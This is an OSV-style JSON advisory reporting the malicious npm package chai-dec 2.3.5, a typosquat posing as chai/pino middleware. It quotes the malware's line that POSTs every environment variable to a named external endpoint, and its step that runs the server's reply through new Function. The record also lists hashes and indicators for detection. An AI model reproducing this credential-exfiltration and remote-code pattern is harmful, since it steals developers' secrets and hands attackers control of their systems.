{"id":"MAL-2026-5606","summary":"Malicious code in chai-dec (npm)","details":"\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (5fbe1098e3267cf9e98fe2591e27b58f87fb44ca8c5475a5fde64fed8c2dd1c3)\nchai-dec impersonates the chai/pino ecosystem (package name rides on chai; package.json keywords and exports — `module.exports.pino = middleware` — masquerade as the pino logger). When the exported middleware factory is invoked (the standard Express-style usage), index.js spawns a detached Node child running lib/initializeCaller.js. That script POSTs the entire process.env object to https://ipcheck-hashed.vercel.app/api/auth/6c1d60d35852ef0c05df via `axios.post(apiEndpoint, {...process.env }, { headers: { 'x-secret-header': 'secret' } })`, leaking every environment variable on the consumer's machine (AWS/GitHub/npm tokens, DB credentials, CI secrets, etc.). The destination URL is hidden behind a base64 blob in a locally-shadowed `process.env.DEV_API_KEY` and decoded with `atob` at runtime to evade static review. The HTTP response body is then passed to `new Function('require', response.data)` and invoked with the real `require`, giving the operator of the endpoint arbitrary remote code execution in the consumer process with full Node privileges. This is a typosquat lure carrying a credential-harvest + dynamic-RCE payload.\n","modified":"2026-06-11T08:01:31.203508965Z","published":"2026-06-11T07:18:08Z","database_specific":{"malicious-packages-origins":[{"id":"IN-MAL-2026-005693","modified_time":"2026-06-11T07:18:08Z","versions":["2.3.5"],"sha256":"5fbe1098e3267cf9e98fe2591e27b58f87fb44ca8c5475a5fde64fed8c2dd1c3","source":"amazon-inspector","import_time":"2026-06-11T07:49:41.792565932Z"}]},"references":[{"type":"PACKAGE","url":"https://www.npmjs.com/package/chai-dec/v/2.3.5"}],"affected":[{"package":{"name":"chai-dec","ecosystem":"npm","purl":"pkg:npm/chai-dec"},"versions":["2.3.5"],"database_specific":{"indicators":{"package_integrity":[{"hashes":{"sha1":"787de62f68c405baa2f9ab203d2e59431f51614c","sha512_sri":"sha512-s5+MofCrzKo3WDjEDqlUyH/KcipEvzT0r3Fu84aHjvtl/qBzTi65LifIvN4efA/9TifLfNUr7MK6YPWcn8GT3Q=="},"filename":"chai-dec-2.3.5.tgz"}],"evidence_files":[{"tlsh":"f921f38e15fe101d066751e6bb2f24027022e8133946d4a47bcc835b1fc966e99936df","path":"lib/initializeCaller.js","sha256":"fc61b0ed62e346bfbb5e1e093e475d8b3065247dc8d315f0ea4e7cafd9661bad"},{"tlsh":"91019760ce789e2300ed25824c2a0643b6618c13a928fc2d32db512d0f9d8bf01bf22e","path":"package.json","sha256":"cb36fcdc10b8fb077ba9ebf442a53b851683ee6c86f953da370938098eced313"}]},"cwes":[{"cweId":"CWE-506","name":"Embedded Malicious Code","description":"The product contains code that appears to be malicious in nature."}],"source":"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/chai-dec/MAL-2026-5606.json"}}],"schema_version":"1.7.5","credits":[{"name":"Amazon Inspector","contact":["inspector-research@amazon.com"],"type":"FINDER"}]}